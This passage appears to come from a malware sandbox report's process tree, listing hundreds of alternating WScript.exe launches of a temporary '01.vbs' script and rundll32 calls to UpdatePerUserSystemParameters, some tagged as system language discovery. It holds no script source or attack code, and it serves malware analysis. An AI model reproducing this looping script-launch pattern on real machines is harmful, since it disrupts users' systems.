- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6884
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7184
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7192
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7232
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7244
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7276
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7292
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7320
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7328
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7364
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7380
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7408
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7416
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7452
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7464
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7496
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7508
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7540
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7548
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7592
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7600
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7636
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7652
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7680
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7696
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7724
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7732
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7768
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7784
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7812
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7824
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7856
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7864
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7900
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7916
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7944
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7972
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7996
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8016
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8040
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8060
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8088
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8104
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8132
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8140
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8176
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7172
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7208
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4924
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7292
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7344
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7440
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7416
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7572
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7548
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7664
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7700
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:4976
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1528
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7888
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1948
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4036
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7976
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:2824
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2372
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8076
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8116
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7180
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7172
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:4944
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7388
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:1432
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1800
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7784
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:904
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7980
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8020
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7244
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:7344
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:4824
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5096
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:904
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8160
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8104
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8204
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8212
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8248
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8264
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8296
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8312
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8340
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8348
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8384
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8400
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8428
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8436
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8488
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8512
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8548
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8564
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8604
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8620
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8664
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8676
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8708
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8720
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8768
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8780
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8824
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8844
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8872
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8908
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8968
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8984
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9016
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9024
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9088
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9124
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9164
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9188
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8232
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8284
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8412
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8400
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8584
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8692
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:3992
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8796
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5240
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8908
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8952
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9028
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:3940
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9084
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9192
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9188
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:2128
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8484
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:2296
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:3300
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:2352
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5380
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:2252
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8856
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5556
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:3940
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:4092
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:8564
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5436
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6128
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5596
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:4192
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:3940
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:5800
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:4300
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:4192
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6128
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9260
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9276
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9312
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9320
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9364
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9376
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9416
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9428
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9476
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9504
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9528
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9552
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9580
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9596
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9632
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9656
